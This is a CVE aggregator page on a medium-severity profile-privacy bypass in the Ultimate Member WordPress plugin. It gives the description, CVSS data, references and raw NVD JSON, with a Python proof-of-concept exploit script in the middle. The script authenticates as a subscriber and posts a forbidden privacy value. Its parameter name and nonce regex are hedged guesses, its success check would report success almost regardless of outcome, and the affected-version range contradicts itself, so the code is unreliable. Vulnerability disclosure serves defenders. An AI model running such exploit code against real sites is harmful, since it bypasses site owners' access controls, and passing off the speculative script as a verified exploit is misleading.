CVE-2025-14081

Description

The Ultimate Member plugin for WordPress is vulnerable to Profile Privacy Setting Bypass in all versions up to, and including, 2.11.0. This is due to a flaw in the secure fields mechanism where field keys are stored in the allowed fields list before the `required_perm` check is applied during rendering. This makes it possible for authenticated attackers with Subscriber-level access to modify their profile privacy settings (e.g., setting profile to "Only me") via direct parameter manipulation, even when the administrator has explicitly disabled the option for their role.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Ultimate Member Plugin < 2.11.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys
from urllib.parse import urljoin

# CVE-2025-14081 PoC - Ultimate Member Privacy Setting Bypass
# Target: WordPress site with Ultimate Member plugin <= 2.11.0

def exploit_privacy_bypass(target_url, username, password):
    """
    Exploit for Ultimate Member Profile Privacy Setting Bypass
    Allows authenticated users with subscriber role to modify profile privacy
    even when admin has explicitly disabled this option for their role.
    """
    session = requests.Session()
    
    # Step 1: Authentication
    login_url = urljoin(target_url, '/wp-login.php')
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': target_url
    }
    resp = session.post(login_url, data=login_data)
    
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print('[-] Authentication failed')
        return False
    print('[+] Authentication successful')
    
    # Step 2: Get WordPress nonce for the account page
    account_url = urljoin(target_url, '/account/')
    resp = session.get(account_url)
    
    # Extract nonce from page content (adjust regex as needed)
    import re
    nonce_match = re.search(r'name="_wpnonce" value="([a-f0-9]+)"', resp.text)
    if not nonce_match:
        print('[-] Could not extract nonce')
        return False
    nonce = nonce_match.group(1)
    print(f'[+] Extracted nonce: {nonce[:10]}...')
    
    # Step 3: Submit privacy setting bypass request
    # The vulnerable parameter is 'um_profile_privacy' or similar
    # Setting it to 'only_me' when admin has disabled this option
    bypass_data = {
        'um_profile_privacy': 'only_me',  # The bypassed value
        '_wpnonce': nonce,
        'action': 'um_update_profile',
        'form_id': '1'
    }
    
    resp = session.post(account_url, data=bypass_data)
    
    # Step 4: Verify the bypass was successful
    resp = session.get(account_url)
    if 'only_me' in resp.text or 'privacy' in resp.text.lower():
        print('[+] Bypass successful - Privacy setting modified')
        return True
    else:
        print('[-] Bypass may have failed - Check manually')
        return False

if __name__ == '__main__':
    if len(sys.argv) < 4:
        print(f'Usage: python {sys.argv[0]} <target_url> <username> <password>')
        sys.exit(1)
    exploit_privacy_bypass(sys.argv[1], sys.argv[2], sys.argv[3])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14081
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14081
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14081/
[4] VulDB https://vuldb.com/cve/CVE-2025-14081
[5] https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-account.php#L610
[6] https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/um-actions-account.php#L322
[7] https://plugins.trac.wordpress.org/changeset/3421362/
[8] https://www.wordfence.com/threat-intel/vulnerabilities/id/aad57a68-c385-491f-a5a2-32906df4b52b?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14081", "sourceIdentifier": "[email protected]", "published": "2025-12-17T19:16:01.543", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Ultimate Member plugin for WordPress is vulnerable to Profile Privacy Setting Bypass in all versions up to, and including, 2.11.0. This is due to a flaw in the secure fields mechanism where field keys are stored in the allowed fields list before the `required_perm` check is applied during rendering. This makes it possible for authenticated attackers with Subscriber-level access to modify their profile privacy settings (e.g., setting profile to \"Only me\") via direct parameter manipulation, even when the administrator has explicitly disabled the option for their role."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-account.php#L610", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/um-actions-account.php#L322", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3421362/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/aad57a68-c385-491f-a5a2-32906df4b52b?source=cve", "source": "[email protected]"}]}}